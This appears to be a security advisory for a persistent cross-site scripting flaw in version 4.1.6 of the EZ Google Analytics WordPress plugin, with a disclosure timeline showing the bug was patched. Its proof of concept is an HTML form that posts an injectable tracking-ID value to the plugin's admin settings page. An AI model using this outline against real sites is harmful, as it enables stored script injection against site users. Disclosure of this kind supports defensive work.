Wordpress EZ Google Analytics Plugin 4.1.6 - Persistant XSS Vulnerability

🗓️ 10 Oct 2015 00:00:00Reported by ZwXType

zdt🔗 0day.today👁 26 Views

Wordpress Plugin EZ Google Analytics 4.1.6 Persistent XSS Vulnerabilit

# Title : Wordpress Plugin : EZ Google Analytics 4.1.6 - Persistant XSS vulnerability
# Author : ZwX
# Date : 15/02/2015
# Downoload : https://downloads.wordpress.org/plugin/ez-google-analytics.4.1.06.zip
# Vendor : http://wordpress.ieonly.com
# Tested on : Windows 7

+----------------------+                        
  Description & Detail        
+----------------------+          

The variable "ezga_settings_array[tracking_id]" is vulnerable to cross site scripting attack.
To access the vulnerability must connect to the administration interface.

+----------------------+  
   Proof Of Concept
+----------------------+

<form method="post" action="http://127.0.01/projects/wordpress/wp-admin/options-general.php?page=ezga-settings"/>
<text>Tracking ID:</text>
<input name="ezga_settings_array[tracking_id]" placeholder="UA-0000000-00" value="[XSS Here]"/>
<input name="submit" id="submit" class="button button-primary" value="Save changes" type="submit">
</form>

+----------------------+
        Video
+----------------------+

https://www.youtube.com/watch?v=o8_DS__xY1o

+----------------------+
       Timeline
+----------------------+

# 15/02/2015 - Vulnerability Found
# 15/02/2015 - Vendor Contacted
# 16/02/2015 - Vendor Response
# 20/02/2015 - Vulnerability Patched
# 21/02/2015 - Vulnerability Disclosure

#  0day.today [2018-04-09]  #

10 Oct 2015 00:00Current

7.1High risk

Vulners AI Score7.1